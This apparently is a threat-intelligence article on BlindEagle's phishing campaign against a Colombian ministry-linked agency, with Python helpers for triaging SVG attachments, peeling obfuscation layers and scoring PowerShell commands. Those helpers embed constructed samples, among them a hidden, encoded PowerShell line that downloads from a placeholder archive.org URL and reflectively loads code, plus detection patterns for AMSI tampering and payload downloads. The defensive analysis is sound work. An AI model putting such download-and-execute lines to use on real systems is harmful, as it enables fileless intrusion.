
BlindEagle, a South American threat group, has launched a sophisticated campaign against Colombian government bodies that marks a concerning advance in its attack tradecraft.

In early September 2025, the group targeted a government entity linked to the Ministry of Commerce, Industry, and Tourism (MCIT) with coordinated phishing emails and a multi-stage malware delivery chain.

The attack marks a considerable escalation in the complexity of BlindEagle's operations: rather than simply dropping malware, it runs a carefully coordinated sequence of multiple malicious components.

The attack begins with a carefully crafted phishing email impersonating the Colombian judicial system.

The message uses legal jargon and official government styling to create a sense of urgency, pressing recipients to confirm receipt of what appears to be a labor lawsuit notification.

Notably, the phishing email was sent from a compromised account inside the same agency, which lent it credibility and let it pass standard email security controls.

This internal foothold let the attackers exploit existing trust relationships and avoid detection by controls that are typically tuned to external threats.

Zscaler researchers mapped the full attack chain and concluded that BlindEagle used an unusually intricate fileless approach to evade detection.

The SVG attachment included in BlindEagle’s phishing email (Source - Zscaler)

The initial attachment is an SVG (Scalable Vector Graphics) image carrying encoded HTML that leads users to a fake web portal resembling the legitimate Colombian judicial branch site.

Once a user interacts with the portal, the chain proceeds through three JavaScript files and a PowerShell command, each stage deobfuscating the next using a mix of encodings, including Base64 and custom obfuscation.
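
An SVG file is XML, so the check a mail gateway or analyst wants here is a structural one: does the image carry script, event handlers or data/javascript URLs, and what do any Base64 blobs inside its script decode to? The following triage helper is an added example written for this article, not code from Zscaler or from the sample itself; the SVG, the hidden HTML and the placeholder domain are all constructed here to mirror the shape of the attachment the article describes.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample (not the real attachment): a harmless-looking SVG whose
# <script> holds a Base64 HTML blob that redirects to a placeholder domain.
HIDDEN_HTML = (b'<html><meta http-equiv="refresh" '
               b'content="0;url=https://portal-login.example.invalid/ingreso"></html>')
SAMPLE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="200" height="80">'
    b'<rect width="200" height="80" fill="#1f3b70"/>'
    b'<text x="10" y="45" fill="white">Rama Judicial</text>'
    b'<script type="text/javascript"><![CDATA[var p="' + base64.b64encode(HIDDEN_HTML) +
    b'";document.write(atob(p));]]></script></svg>'
)
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(rb"https?://[^\s'\"<>]+")


def _local(name):
    """Strip a namespace prefix such as '{http://www.w3.org/2000/svg}'."""
    return name.split("}")[-1].lower()


def _try_b64(blob):
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:
        return None


def triage_svg(svg_bytes):
    """Return (kind, detail) findings: active elements, on* event handlers,
    javascript:/data:text/html hrefs, and decoded Base64 blobs from scripts.
    xml.etree does not fetch external entities, but production code should
    still parse untrusted XML through defusedxml."""
    findings = []
    root = ET.fromstring(svg_bytes)
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(("active-element", tag))
        for attr, val in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(("event-handler", name))
            elif name == "href" and val.lower().startswith(("javascript:", "data:text/html")):
                findings.append(("suspicious-href", val[:40]))
        if tag == "script" and el.text:
            for blob in B64_RE.findall(el.text):
                decoded = _try_b64(blob)
                if decoded is not None:
                    findings.append(("embedded-base64", decoded))
    return findings


def hidden_urls(findings):
    """URLs that only become visible after decoding embedded Base64 blobs."""
    urls = []
    for kind, detail in findings:
        if kind == "embedded-base64":
            urls += [u.decode("ascii", "replace") for u in URL_RE.findall(detail)]
    return urls


if __name__ == "__main__":
    found = triage_svg(SAMPLE_SVG)
    for kind, detail in found:
        print(kind, detail if isinstance(detail, str) else detail[:60])
    print("hidden URLs:", hidden_urls(found))
```

The design point is that the decision is made on parsed structure rather than on a string search for "script": an SVG with no script, no `on*` attributes and no `javascript:`/`data:text/html` references yields an empty finding list, while the redirect target in the sample only surfaces after the Base64 layer is decoded.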

Infection method

The infection method is notably sophisticated, relying on steganography and legitimate services for payload delivery.

The JavaScript files in the chain run complex deobfuscation routines that turn integer arrays into executable code.
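
The "integer array to code" pattern is usually `String.fromCharCode` over a numeric array, often with a per-character shift, wrapped in further Base64 layers. The layer-peeling helper below is an added analyst example, not code from the article or from the sample: it constructs its own three-layer input (a shifted integer array spelling a script that carries a Base64 blob spelling a placeholder final stage) and unwraps it outermost-first, which goes slightly beyond the page by also detecting the shift value.

```python
import base64
import re

INT_ARRAY_RE = re.compile(r"\[\s*(\d{1,6}(?:\s*,\s*\d{1,6}){8,})\s*\]")
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
DELTA_RE = re.compile(r"fromCharCode\(\s*\w+(?:\[\w+\])?\s*([-+])\s*(\d+)\s*\)")

# Constructed three-layer sample (not the real files): an integer array
# shifted by +7 spells STAGE2, whose Base64 literal spells STAGE3.
STAGE3 = ("// stage 3 placeholder: the real chain reaches a PowerShell command here\n"
          "var next = 'PLACEHOLDER';")
STAGE2 = 'var b = "' + base64.b64encode(STAGE3.encode()).decode() + '";\neval(atob(b));'
STAGE1 = ("var a = [" + ",".join(str(ord(c) + 7) for c in STAGE2) + "];\n"
          "eval(a.map(function(x){return String.fromCharCode(x-7)}).join(''));")


def detect_delta(js):
    """Pick up a per-character shift such as fromCharCode(x-7); 0 if none."""
    m = DELTA_RE.search(js)
    if not m:
        return 0
    return int(m.group(2)) if m.group(1) == "+" else -int(m.group(2))


def decode_int_arrays(js, delta=0):
    """Render every long integer array in js as the string it spells."""
    out = []
    for m in INT_ARRAY_RE.finditer(js):
        codes = [int(n) + delta for n in m.group(1).split(",")]
        if all(0 <= c < 0x110000 for c in codes):
            out.append("".join(chr(c) for c in codes))
    return out


def decode_b64_strings(js):
    """Decode every Base64-looking literal that yields readable text."""
    out = []
    for blob in B64_RE.findall(js):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            out.append(text)
    return out


def peel(js, max_layers=5):
    """Unwrap layers outermost-first until nothing further decodes.
    Integer arrays are tried before Base64, because a stage that carries an
    array is itself usually plain text, not a Base64 literal."""
    layers = [js]
    for _ in range(max_layers):
        cur = layers[-1]
        found = decode_int_arrays(cur, detect_delta(cur)) or decode_b64_strings(cur)
        if not found:
            break
        layers.append("\n".join(found))
    return layers


if __name__ == "__main__":
    for i, layer in enumerate(peel(STAGE1)):
        print(f"--- layer {i} ({len(layer)} chars) ---")
        print(layer[:120])
```

Each recovered layer is returned rather than executed, so the helper is safe to run over a real sample's text; the `max_layers` bound keeps a self-referential or very deep chain from looping.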

The PowerShell command fetches an image file from the Internet Archive, extracts a Base64-encoded malicious payload hidden inside it, and loads that payload directly into memory using .NET reflection.

Fraudulent web portal presented to the user during BlindEagle’s attack (Source - Zscaler)

Because execution happens entirely in memory, no malicious file ever touches the disk, which considerably complicates detection for traditional file-based security products.

The PowerShell script runs Caminho, a downloader containing Portuguese-language artifacts in its code, which in turn retrieves DCRAT from Discord's content delivery network.

DCRAT includes advanced evasion features, most notably tampering with Microsoft's Antimalware Scan Interface (AMSI) to disable detection.

Decoded BlindEagle PowerShell command (Source - Zscaler)
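
When the payload never lands on disk, the PowerShell command line and the decoded script are often the only artifacts an EDR or SIEM gets to inspect. The triage function below is an added example for this article, not Zscaler's tooling or the actual decoded command: it handles the `-EncodedCommand` edge case (the script is Base64 of UTF-16LE text, so a UTF-8 decode yields NUL-interleaved junk) and then scores the behaviours the article attributes to this chain and to DCRAT (Base64 decoding, reflective .NET loading, archive.org and Discord CDN downloads, AMSI tampering). The indicator names, weights, the constructed sample script and its placeholder URL are this example's own.

```python
import base64
import re

# Indicator names and weights are this example's choice, not a vendor's scoring.
INDICATORS = [
    ("base64-decode",    re.compile(r"FromBase64String", re.I), 2),
    ("reflective-load",  re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), 4),
    ("web-download",     re.compile(r"Net\.WebClient|Download(?:Data|String|File)|Invoke-WebRequest", re.I), 2),
    ("internet-archive", re.compile(r"archive\.org/", re.I), 2),
    ("discord-cdn",      re.compile(r"cdn\.discordapp\.com", re.I), 2),
    ("amsi-tamper",      re.compile(r"amsiInitFailed|AmsiScanBuffer|AmsiUtils", re.I), 4),
    ("launcher-flags",   re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I), 1),
]
URL_RE = re.compile(r"https?://[^\s'\"<>);]+")
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob; the \b keeps
# -ep (ExecutionPolicy) and -ea (ErrorAction) from matching.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed sample modelled on the article's description (download an image
# from the Internet Archive, carve a Base64 payload out of it, load it with
# .NET reflection). The carving step is omitted and the URL is a placeholder.
SAMPLE_SCRIPT = "\n".join([
    "$w = New-Object Net.WebClient",
    "$img = $w.DownloadData('https://archive.org/download/PLACEHOLDER-ITEM/PLACEHOLDER.png')",
    "# ...carving of the Base64 payload from $img omitted in this sample...",
    "$asm = [Reflection.Assembly]::Load([Convert]::FromBase64String($payload))",
])
ENCODED_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                   + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))


def decode_encoded_command(cmdline):
    """Return (script_text, was_encoded), decoding -EncodedCommand as UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, False
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le"), True
    except (ValueError, UnicodeDecodeError):
        return cmdline, False


def triage_powershell(cmdline):
    """Decode if needed, then report indicator hits, a summed score, and URLs
    seen in either the launcher line or the decoded script."""
    script, encoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + script if encoded else cmdline
    hits = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"script": script, "encoded": encoded, "hits": hits,
            "score": score, "urls": URL_RE.findall(haystack)}


if __name__ == "__main__":
    report = triage_powershell(ENCODED_CMDLINE)
    print("encoded:", report["encoded"], "score:", report["score"])
    print("hits:", report["hits"])
    print("urls:", report["urls"])
```

Searching the decoded script rather than the raw command line is what makes the difference: against the Base64 blob alone none of the patterns fire, which is exactly why the attackers encode it.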

The malware establishes persistence through scheduled tasks and registry changes, giving the attackers sustained access to compromised systems.

The campaign illustrates BlindEagle's evolution as a threat actor, combining social engineering with technical skill in obfuscation, steganography, and abuse of legitimate services to mount targeted attacks on government infrastructure with a reduced risk of detection.
